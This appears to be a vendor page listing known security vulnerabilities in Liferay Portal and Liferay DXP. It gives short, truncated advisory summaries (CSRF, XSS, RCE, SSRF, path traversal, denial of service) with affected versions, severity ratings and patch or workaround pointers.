Known Vulnerabilities

Cross-Site Request Forgery (CSRF) vulnerability in the server (license) registration page in Liferay Portal and Liferay DXP allows remote attackers to register a server license via the 'orderUuid'...

Path traversal vulnerability with the downloading and installation of Xuggler in Liferay Portal and Liferay DXP allows remote attackers to (1) add files to arbitrary locations on the server and (2)...

Liferay Portal 7.4.3.22 Liferay DXP 7.4 Update 10 Liferay DXP 7.3 Update 26 SessionClicks in Liferay Portal and Liferay DXP does not restrict the saving of request parameters in the HTTP session,...

Insufficient CSRF protection for omni-administrator users in Liferay Portal and Liferay DXP allows attackers to execute Cross-Site Request Forgery Liferay Portal 7.4.3.120 Liferay DXP 2024.Q2.0...

Severity 1 The Script Console in Liferay Portal and Liferay DXP does not sufficiently protect against Cross-Site Request Forgery (CSRF) attacks, which allows remote attackers to execute arbitrary...

The Portal Security module in Liferay Portal 7.2.1 and earlier does not correctly import users from LDAP, which allows remote attackers to prevent a legitimate user from authenticating by...

Cross-site scripting (XSS) vulnerability in the Server module's script console in Liferay Portal 7.3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the output of a...

The Portal Workflow module in Liferay Portal 6.2.2 through 7.3.2, user's passwords are stored in the database if workflow is enabled for new users. This allows attackers with access to the database...

Liferay Portal 7.3.3 May 2021 source patch for Liferay Portal 7.2.1. Details for working with source patches can be found on the Patching Liferay Portal page. There is no fix available for Liferay...

Liferay Portal 7.3.3 May 2021 source patch for Liferay Portal 7.2.1. Details for working with source patches can be found on the Patching Liferay Portal page. There is no fix available for Liferay...

The Flags module in Liferay Portal 7.3.1 and earlier does not limit the rate at which content can be flagged as inappropriate, which allows remote authenticated users to spam the site administrator...

Liferay Portal 7.1.0 and earlier is vulnerable to denial-of-service (DoS) attacks via file uploads because of vulnerabilities in Apache Tika. Severity 1 Liferay Portal 7.1.1 March 2020 source patch...

Liferay Portal 7.0.3 March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. The RSS portlet and FuseMail...

Liferay Portal 6.2.5 and earlier does not properly check permissions, which allows remote authenticated users to impersonate, edit, or delete administrators. Workaround: Remove the User.DELETE,...

Remote code execution vulnerability in DDM template in Liferay Portal 7.0.0 and earlier allows remote authenticated users with permission to create/edit templates to create templates that can run...

Denial-of-service (DoS) vulnerability in document library in Liferay Portal 6.2.5 and earlier allows remote attackers to cause an OutOfMemoryError by uploading a crafted PDF file. Workaround: Use...

Remote file disclosure vulnerability in DDM templates in Liferay Portal 6.2.5 and earlier allows remote authenticated users with permission create/edit templates to view any files that are readable...

March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. The IFrame portlet in Liferay Portal 6.2.5 and earlier...

Server side request forgery (SSRF) vulnerability in pingback functionality of blogs in Liferay Portal before 7.1.0 allows remote attackers to send HTTP requests to intranet servers and conduct...

Liferay Portal 7.0.1 March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. Review permissions settings and do...

In Liferay Portal 7.1 CE GA4 and earlier, a potential SQL injection vulnerability exist in the asset framework. Severity 1 March 2020 source patch for Liferay Portal 7.1.3. Details for working with...

In Liferay Portal 7.2.0 and earlier contains a remote code execution (RCE) vulnerability via JSON web services (JSONWS).   Workaround: Disable JSONWS by setting the portal.property...

Liferay Portal 7.1.1 March 2020 source patch for Liferay Portal 7.0.6. Details for working with source patches can be found on the Patching Liferay Portal page. March 2020 source patch for Liferay...

Liferay Portal 7.1.0 and earlier is vulnerable to remote code execution (RCE) via deserialization of JSON data. Severity 1 Liferay Portal 7.1.1 March 2020 source patch for Liferay Portal 7.0.6....

Liferay Portal 7.1.0 and earlier contains a path traversal vulnerability in Web Content templates and Application Display Templates (ADT). The vulnerability allows any user with permission to...

Liferay Portal 7.1.0 and earlier is vulnerable to a Server-Side Request Forgery (SSRF) via Web Content templates and Application Display Templates (ADT) which may allow an attacker access to...

In Liferay Portal 7.0.5 and earlier, the Web Proxy portlet/application allows remote attackers to execute arbitrary code via supplied stylesheet. Patched versions of the portal will prevent users...

The portal may be vulnerable to BREACH attacks if the portal is using HTTPS and compression (GZip) is enabled. Workaround: Disable compression by setting...

The "doAsUserId" parameter used by Administrators for impersonating another user can be leaked to third party sites. Severity 2 Liferay Portal 7.0.6

Liferay Portal 7.0.6 The asset tag API leaks information about the user who created the asset tag. Severity 2

A reflected cross-site scripting (XSS) vulnerability exist on the JSONWS API page. An attacker can potentially exploit this security vulnerability to insert malicious JavaScript into a page....

Content spoofing is possible via URL manipulation in applications that suppor tags. An attacker can potentially exploit this security vulnerability to spoof content and mislead users. Severity 2...

All files within the application's WAR folder is accessible via crafted URL. Severity 1 Liferay Portal 7.0.5

Liferay Portal 7.0.5 March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. In Liferay Portal 7.0.4 and earlier,...

In a shared environment (e.g., a computer at a library or internet cafe), a user's reminder query answer may be accessible by another user. Severity 2 Liferay Portal 7.0.4

User's email address, screen name or user id (depending on the authentication method) is exposed in URL. Severity 2 Liferay Portal 7.0.4

In Liferay Portal 7.0 CE GA3, Velocity and FreeMarker templates does not properly restrict the use of some variables, which allow any user with permission to create a template to insert arbitrary...

7.0.3-ce-ga4-security-1.0 patch (source) March 2020 source patch for Liferay Portal 6.2.5. Details for working with source patches can be found on the Patching Liferay Portal page. In Liferay...

In Liferay Portal 7.0 CE GA4, AggregateFilter, MinifierFilter and DynamicCSSFilter allows unauthenticated users to cause a denial of service (disk consumption) via crafted URL. Severity 1...

Multiple cross-site scripting (XSS) vulnerabilities allow remote attackers to inject arbitrary web script or HTML into a page. Severity 2 Liferay Portal 7.0.0 This issue was reported by Marko Winkler